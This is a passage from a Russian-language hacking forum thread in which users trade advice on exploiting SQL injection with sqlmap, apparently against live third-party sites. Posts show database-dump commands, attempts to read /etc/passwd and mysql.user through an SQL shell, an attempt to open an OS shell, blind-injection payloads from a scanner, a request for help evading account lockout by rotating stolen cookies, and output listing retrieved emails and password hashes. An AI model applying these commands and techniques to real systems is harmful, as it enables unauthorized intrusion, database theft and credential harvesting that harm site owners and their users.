HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1031  
Старый 01.05.2020, 17:23
LeninDie
Guest
Сообщений: n/a
Провел на форуме:
12479

Репутация: 2
По умолчанию

столкнулся с ситуацией что приложение лочит аккаунт после 10 ошибок 500, скуля слепая и иначе данные никак не получить. поскольку лочится сам аккаунт то думаю что можно юзать куки от нескольких пользователей. на ум приходит только заменять куки при каждом запросе на новые и далее по кругу при каждом запросе (брать их из текстового файла) с определенным таймингом и подключить этот скрипт в качестве темпера. Подскажите это осуществимо? Мог бы кто нибудь помочь с реализацией за вознаграждение?)
 
Ответить с цитированием

  #1032  
Старый 05.05.2020, 06:46
rozzet
Guest
Сообщений: n/a
Провел на форуме:
1085

Репутация: 0
По умолчанию

Цитата:
Сообщение от karkajoi  
karkajoi said:

Точно так же как написали выше, со слепыми может быть ложное срабатывание
если акунетикс пишет SQL injection а не блинд, значит ложные исключены?

Как часто акунетикс выдает ложные скули?
 
Ответить с цитированием

  #1033  
Старый 05.05.2020, 06:50
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от rozzet  
rozzet said:

если акунетикс пишет SQL injection а не блинд, значит ложные исключены?
Как часто акунетикс выдает ложные скули?
Ну если он пишет что union query или error based, то да, если time based то может и ложное, где то процентов 15
 
Ответить с цитированием

  #1034  
Старый 10.05.2020, 14:13
tester_new
Guest
Сообщений: n/a
Провел на форуме:
108975

Репутация: 24
По умолчанию

Буду рад помощи, сливаю базу ниже указанным способом:

Код:
Code:
sqlmap -r my_http  --dump --threads=5 --dbms=mysql --dump -D some_db  --risk=3
Скорость просто ужас(пробовал менять потоки, тайминги итд.. результата ноль) Как следствие Пробую слить данные только админов, указываю таблицу и запускаю:

Код:
Code:
sqlmap -r my_http  --dump --threads=5 --dbms=mysql --dump -D some_db  -T admin_table --risk=3

[12:15:44] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done) 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[12:15:56] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[12:15:57] [INFO] adjusting time delay to 1 second due to good response times
[12:15:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[12:15:58] [ERROR] unable to retrieve the number of columns for table 'admin_table' in database 'some_db'
[12:15:58] [WARNING] unable to retrieve column names for table 'admin_table' in database 'some_db'
[12:18:10] [WARNING] unable to enumerate the columns for table 'admin_table' in database 'some_db'
[12:18:10] [INFO] fetched data logged to text files under '/root/.sqlmap/....'
Получаю облом.... Пробую --sql-shell:

Код:
Code:
sql-shell> SELECT LOAD_FILE('/etc/passwd');
[INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('/etc/passwd')'
[INFO] retrieved:

sql-shell> desc mysql.user
[INFO] fetching SQL query output: 'desc mysql.user'
[INFO] retrieved:

sql-shell> SELECT * FROM mysql.user;
[INFO] fetching SQL SELECT statement query output: 'SELECT * FROM mysql.user'
[INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[INFO] fetching columns for table 'user' in database 'mysql'
[INFO] retrieved:
[ERROR] unable to retrieve the number of columns for table 'user' in database 'mysql'
[INFO] retrieved:
[WARNING] the SQL query provided does not return any output
Снова облом а именно... в первых двух случаях получаю просто пустые строки, в третьем случае просто ошибка, пробую заюзать --os-shell:

Код:
Code:
[WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
Если лить в первый path-и(1) то получаю постоянно 404 (Not Found)

пробовал сразу сбрутить(4) по предоставленному sqlmap-ом словарю... но все без результата.

Главный вопрос: как так я могу получить дамп всей базы но не имею возможность указать конкретную таблицу?

Пробовал имя таблицы указывать в ' ' подскажите что я упускаю...

Решение:

Напишу вдруг кому то поможет В моем случае проблема была в том что при запуске я 'соглашался' на редирект, после отказа от редиректа данные начали извлекаться нормально.
 
Ответить с цитированием

  #1035  
Старый 24.05.2020, 11:06
vladF
Guest
Сообщений: n/a
Провел на форуме:
6200

Репутация: 0
По умолчанию

Нужна помощь

Сканер выдал такое:

Код:
Code:
This vulnerability affects /part_eYXfQU0lw9rhwob9qRP2GVMv.html.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input partid was set to -1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'='

Tests performed:
-1' OR 2+323-323-1=0+0+0+1 or 'XAZghp6T'=' => TRUE
-1' OR 3+323-323-1=0+0+0+1 or 'XAZghp6T'=' => FALSE
-1' OR 3*2 FALSE
-1' OR 3*2>(0+5+323-323) or 'XAZghp6T'=' => FALSE
-1' OR 2+1-1-1=1 AND 000323=000323 or 'XAZghp6T'=' => TRUE
-1' OR 000323=000323 AND 3+1-1-1=1 or 'XAZghp6T'=' => FALSE
-1' OR 3*2=5 AND 000323=000323 or 'XAZghp6T'=' => FALSE
-1' OR 3*2=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE
-1' OR 3*2*0=6 AND 000323=000323 or 'XAZghp6T'=' => FALSE
-1' OR 3*2*1=6 AND 000323=000323 or 'XAZghp6T'=' => TRUE
Как правильно скормить в sqlmap?
 
Ответить с цитированием

  #1036  
Старый 25.05.2020, 23:11
FireRidlle
Новичок
Регистрация: 07.07.2009
Сообщений: 2
Провел на форуме:
16896

Репутация: 0
По умолчанию

как можно скормить sqlmap уязвимость в хедере?
 
Ответить с цитированием

  #1037  
Старый 25.05.2020, 23:48
fandor9
Guest
Сообщений: n/a
Провел на форуме:
169390

Репутация: 47
По умолчанию

Цитата:
Сообщение от FireRidlle  
FireRidlle said:

как можно скормить sqlmap уязвимость в хедере?
Вы можете полностью скопировать запрос в текстовый файл и в уязвимом параметре поставить знак * и потом уже стартовать скульмап:

Код:
Code:
sqlmap -r "zapros.txt"
или же скопировать запрос и при старте указать тестируемый параметр/хедер (например User-Agent):

Код:
Code:
sqlmap -r "zapros.txt" -p "user-agent"
 
Ответить с цитированием

  #1038  
Старый 28.05.2020, 18:02
kacergei
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906

Репутация: -5
По умолчанию

Добрый подскажите как вытянуть пароль в blob?

Пробовал и hex и прочее никак не тянет((

Код:
Code:
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.21-20-beget-5.7.21-20-1-log'
Вечно такой результат

http://joxi.ru/ZrJVX1phw8dRor

http://joxi.ru/KAgK8yWFEDPj0A
 
Ответить с цитированием

  #1039  
Старый 28.05.2020, 19:29
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от kacergei  
kacergei said:

Добрый подскажите как вытянуть пароль в blob?
Пробовал и hex и прочее никак не тянет((
Код:
Code:
back-end DBMS: MySQL >= 5.0.0
banner: '5.7.21-20-beget-5.7.21-20-1-log'
Вечно такой результат
http://joxi.ru/ZrJVX1phw8dRor
http://joxi.ru/KAgK8yWFEDPj0A
https://github.com/sqlmapproject/sqlmap/issues/3158
 
Ответить с цитированием

  #1040  
Старый 31.05.2020, 05:46
vladF
Guest
Сообщений: n/a
Провел на форуме:
6200

Репутация: 0
По умолчанию

Приветствую! Проблема такая: при сливе обрезается хеш:

Код:
Code:
[04:41:49] [INFO] retrieved: 'test@mail.com','$2y$10$IN1YM1wQoCAAI...
[04:41:51] [INFO] retrieved: 'test@mail.com','$2y$10$s7Y6jmxm0Lk5MYk6p727...
[04:41:53] [INFO] retrieved: 'test@mail.net','$2y$10$zIlubVWzn/zVAbNef...
[04:41:54] [INFO] retrieved: 'test@mail.com','$H\\2y$7KguiftaH$10\\ZByke...
[04:41:56] [INFO] retrieved: 'test@mail.com','$2y$10$8ycUx4ZRAtEvOpHS...
[04:41:58] [INFO] retrieved: 'test@mail.com','$2y$10$X2cd3HkmJs5f3DsUtzk...
[04:42:00] [INFO] retrieved: 'test@mail.com','$2y$10$52HMKZS6r4HT...
Как это побороть? Пробовал hex, no-cast
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ